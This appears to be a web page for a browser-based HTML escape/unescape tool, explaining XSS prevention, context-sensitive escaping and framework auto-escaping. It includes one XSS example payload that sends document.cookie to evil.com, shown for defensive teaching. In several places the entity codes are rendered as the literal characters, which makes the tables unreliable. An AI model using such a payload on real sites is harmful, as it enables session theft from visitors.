HTML Escape Unescape

Convert special HTML characters like <, >, &, double quotes, and apostrophes to safe HTML entities (< > &) for XSS prevention and code display — or decode HTML entities back to readable plain text for content migration and template debugging.

HTML Escape Unescape: Paste text containing HTML special characters to escape them into safe entity codes (< > &), or paste escaped HTML to decode it back to readable characters. Essential for displaying code snippets in web pages.

Loading Tool...

This tool requires JavaScript to run.

Please enable JavaScript in your browser to use this free online tool. All processing happens locally in your browser for maximum privacy and speed.

Key Takeaways

Escapes < > & " ' to their HTML entity equivalents
Decodes HTML entities (< & ') back to original characters
Prevents XSS attacks by escaping user input before rendering
Essential when embedding code snippets in HTML pages or blog posts
Supports both named entities (&) and numeric entities (&)

What is HTML Escape Unescape?

HTML Escape Unescape — An HTML Escape Tool is a free tool that converts special characters (<, >, &, ", ') into HTML entities and decodes HTML entities back to their original characters.

This free HTML escape and unescape tool converts reserved HTML characters into safe entity codes and decodes HTML entities back to their original characters — all in your browser with zero server processing. Escape angle brackets (<, >), ampersands (&), double quotes, and single quotes into their HTML entity equivalents (<, >, &, ", ') to prevent cross-site scripting (XSS) vulnerabilities when rendering user-generated content. Display code snippets safely inside blog posts, documentation pages, and CMS templates without triggering browser parsing. The unescape mode reverses the process, converting entity-encoded strings from API responses, database exports, or email templates back into human-readable text. Supports both named entities (&) and numeric entities (&, &) for complete HTML encoding and decoding coverage.

How to Use HTML Escape Unescape

1
Paste raw HTML, code snippets, or user-generated content into the Escape panel to convert all special characters (<, >, &, quotes) into safe HTML entities.
2
Paste entity-encoded strings from APIs, databases, or email templates into the Unescape panel to decode them back into readable plain text.
3
Review the converted output to verify all angle brackets, ampersands, and quotation marks are properly encoded or decoded.
4
Copy the result with one click for use in HTML templates, CMS content fields, blog posts, or application code.

Key Features

Escapes all five HTML-reserved characters: < > & " ' to their entity equivalents

Unescapes both named entities (&, <) and numeric entities (&, &) back to original characters

Bidirectional escape/unescape conversion in a single interface with live preview

One-click copy for paste-ready output in HTML templates, React JSX, and CMS editors

100% client-side processing — your code and content never leave the browser

Handles multi-line input including full HTML documents, JSON with HTML, and code blocks

Use Cases

Preventing XSS attacks by escaping user-generated content before rendering in HTML pages and web applications

Displaying code snippets with angle brackets and ampersands safely inside blog posts, tutorials, and documentation

Decoding HTML entities from API responses, database exports, and RSS feeds during content migration workflows

Debugging double-encoding issues (&lt;) in CMS templates, email HTML, and server-rendered markup

Preparing escaped HTML strings for embedding in JSON payloads, XML feeds, and JavaScript template literals

About HTML Escape Unescape

HTML Escaping: The XSS Prevention Foundation

HTML escaping (also called HTML encoding or entity encoding) converts characters with special meaning in HTML markup into their entity representations. The five core characters that must be escaped:

Character	Named entity	Numeric (dec)	Numeric (hex)	Why escape
`<`	`<`	`<`	`<`	Opens HTML tags
`>`	`>`	`>`	`>`	Closes HTML tags
`&`	`&`	`&`	`&`	Starts other entities
`"`	`"`	`"`	`"`	Breaks attribute values
`'`	`'` (''' HTML5)	`'`	`'`	Breaks single-quoted attrs

Without proper escaping, user content containing these characters can be interpreted as HTML tags or JavaScript, creating Cross-Site Scripting (XSS) vulnerabilities — #2 on the OWASP Top 10.

XSS Attack Example

Imagine a comments form that doesn't escape input. An attacker submits:

<script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>

When the comment renders unescaped, every visitor's browser runs the script, sending their session cookies to the attacker. With proper escaping, the same input renders harmlessly as visible text:

&lt;script&gt;fetch('https://evil.com/steal?cookie=' + document.cookie)&lt;/script&gt;

This single defense — escape all user content before rendering — prevents ~95% of XSS attacks.

Context-Sensitive Escaping

Different contexts require different escape strategies — naive "just escape 5 chars" doesn't always work:

HTML text content: escape < > & (basic XSS protection)
HTML attribute values: escape < > & " ' AND always quote the attribute
JavaScript context (inline script): use JSON.stringify(), not HTML escape — different encoding needed
CSS context (inline style): CSS escaping rules differ — avoid user input here entirely
URL context (href, src): use URL encoding, not HTML escape
Email subject: use RFC 2047 encoding for non-ASCII chars

Modern Framework Auto-Escaping

Most modern frameworks auto-escape by default:

React: JSX auto-escapes {variable}. dangerouslySetInnerHTML bypasses — only use with sanitized content.
Vue: {{variable}} auto-escapes. v-html bypasses.
Angular: {{variable}} auto-escapes. [innerHTML] sanitizes by default.
Django: {{variable}} auto-escapes in templates. {% autoescape off %} bypasses.
Rails: <%= variable %> auto-escapes. raw() or .html_safe bypasses.
Laravel Blade: {{ $variable }} auto-escapes. {!! $variable !!} bypasses.

Don't bypass auto-escaping unless you've sanitized with a battle-tested library (DOMPurify on the client, Bleach in Python, sanitize-html in Node).

Common HTML Entities Reference

  — non-breaking space (forces no line break)
© — © copyright
™ — ™ trademark
® — ® registered
… — … horizontal ellipsis
— — — em dash
– — – en dash
“ ” — “curly quotes”
« » — « » guillemets
€ — € euro
£ — £ pound sterling
× — × multiplication sign
÷ — ÷ division sign
° — ° degree
µ — µ micro

Common Bugs This Tool Catches

Double encoding: &lt; visible in output — content was escaped twice
Mojibake / wrong encoding: entities show as literal "&" in browser — your HTML's charset declaration is wrong
Missing semicolons: &ampltdiv> won't render as a tag — strict parsers require semicolons
Invalid entity names: &copyright; doesn't exist; use ©
Curly quote contamination: Microsoft Word smart quotes (“”) need to become "“"/"”" or straight quotes

Characters Commonly Escaped

Most workflows at minimum escape `<`, `>`, `&`, double quotes, and apostrophes. Depending on context, additional characters may also be encoded using numeric entities.

Developer Workflow Tip

If rendering still looks wrong after escaping, inspect whether content was escaped twice. Double-escaped text often appears with `&lt;` patterns.

Frequently Asked Questions

What is HTML escaping and which characters need to be escaped?: HTML escaping converts the five reserved HTML characters — < (less-than), > (greater-than), & (ampersand), " (double quote), and ' (apostrophe) — into their entity equivalents (<, >, &, ", '). This ensures browsers display them as visible text instead of interpreting them as HTML markup or JavaScript code.
How does HTML escaping prevent XSS (cross-site scripting) attacks?: XSS attacks inject malicious scripts through unescaped user input rendered in HTML. When you escape characters like < and > into < and >, the browser displays them as text instead of executing them as script tags. This is a foundational defense layer recommended by OWASP for all web applications handling user-generated content.
What is the difference between named HTML entities and numeric entities?: Named entities use human-readable labels like &, <, and ". Numeric entities use decimal (&) or hexadecimal (&) code points. Both produce the same output in browsers. This tool supports decoding all three formats back to their original characters.
When should I unescape (decode) HTML entities back to plain text?: Unescape when processing API responses that return HTML-encoded data, migrating content between CMS platforms, parsing RSS or Atom feed content, debugging email templates that display entities as literal text, or comparing text that has been entity-encoded during storage or transmission.
What is double encoding and how do I fix &amp;lt; appearing in my HTML?: Double encoding occurs when already-escaped content gets escaped again, producing patterns like &amp;lt; instead of <. To fix this, decode the text once to restore the single-escaped form, then ensure your application only escapes at the final rendering boundary — not during storage or intermediate processing steps.
Do React, Angular, and Vue automatically escape HTML entities?: Yes, modern frameworks auto-escape content rendered through standard bindings (JSX expressions in React, interpolation in Angular/Vue). However, escape bypasses like dangerouslySetInnerHTML, [innerHTML], and v-html render raw HTML without escaping, making manual escaping necessary for any user-controlled content passed through these APIs.
Is this HTML escape and unescape tool free to use?: Yes, completely free with no signup, no ads, and no usage limits. All encoding and decoding runs 100% client-side in your browser — your HTML code, content, and sensitive data are never sent to any external server.

Loading your tools...

Use Cases

Preventing XSS attacks by escaping user-generated content before rendering in HTML pages and web applications

Displaying code snippets with angle brackets and ampersands safely inside blog posts, tutorials, and documentation

Decoding HTML entities from API responses, database exports, and RSS feeds during content migration workflows

Debugging double-encoding issues (&lt;) in CMS templates, email HTML, and server-rendered markup

Preparing escaped HTML strings for embedding in JSON payloads, XML feeds, and JavaScript template literals

Character

Named entity

Numeric (dec)

Numeric (hex)

Why escape

<

Opens HTML tags

>

Closes HTML tags

&

Starts other entities

"

Breaks attribute values

'

' (''' HTML5)

'

Breaks single-quoted attrs

Frequently Asked Questions

What is HTML escaping and which characters need to be escaped?

HTML escaping converts the five reserved HTML characters — < (less-than), > (greater-than), & (ampersand), " (double quote), and ' (apostrophe) — into their entity equivalents (<, >, &, ", '). This ensures browsers display them as visible text instead of interpreting them as HTML markup or JavaScript code.

How does HTML escaping prevent XSS (cross-site scripting) attacks?

XSS attacks inject malicious scripts through unescaped user input rendered in HTML. When you escape characters like < and > into < and >, the browser displays them as text instead of executing them as script tags. This is a foundational defense layer recommended by OWASP for all web applications handling user-generated content.

What is the difference between named HTML entities and numeric entities?

Named entities use human-readable labels like &, <, and ". Numeric entities use decimal (&) or hexadecimal (&) code points. Both produce the same output in browsers. This tool supports decoding all three formats back to their original characters.

When should I unescape (decode) HTML entities back to plain text?

Unescape when processing API responses that return HTML-encoded data, migrating content between CMS platforms, parsing RSS or Atom feed content, debugging email templates that display entities as literal text, or comparing text that has been entity-encoded during storage or transmission.

What is double encoding and how do I fix &amp;lt; appearing in my HTML?

Double encoding occurs when already-escaped content gets escaped again, producing patterns like &amp;lt; instead of <. To fix this, decode the text once to restore the single-escaped form, then ensure your application only escapes at the final rendering boundary — not during storage or intermediate processing steps.

Do React, Angular, and Vue automatically escape HTML entities?

Yes, modern frameworks auto-escape content rendered through standard bindings (JSX expressions in React, interpolation in Angular/Vue). However, escape bypasses like dangerouslySetInnerHTML, [innerHTML], and v-html render raw HTML without escaping, making manual escaping necessary for any user-controlled content passed through these APIs.

Is this HTML escape and unescape tool free to use?

Yes, completely free with no signup, no ads, and no usage limits. All encoding and decoding runs 100% client-side in your browser — your HTML code, content, and sensitive data are never sent to any external server.

HTML Escape Unescape

Key Takeaways

What is HTML Escape Unescape?

How to Use HTML Escape Unescape

Key Features

Use Cases

About HTML Escape Unescape

HTML Escaping: The XSS Prevention Foundation

XSS Attack Example

Context-Sensitive Escaping

Modern Framework Auto-Escaping

Common HTML Entities Reference

Common Bugs This Tool Catches

Characters Commonly Escaped

Developer Workflow Tip

Frequently Asked Questions

HTML Escape Unescape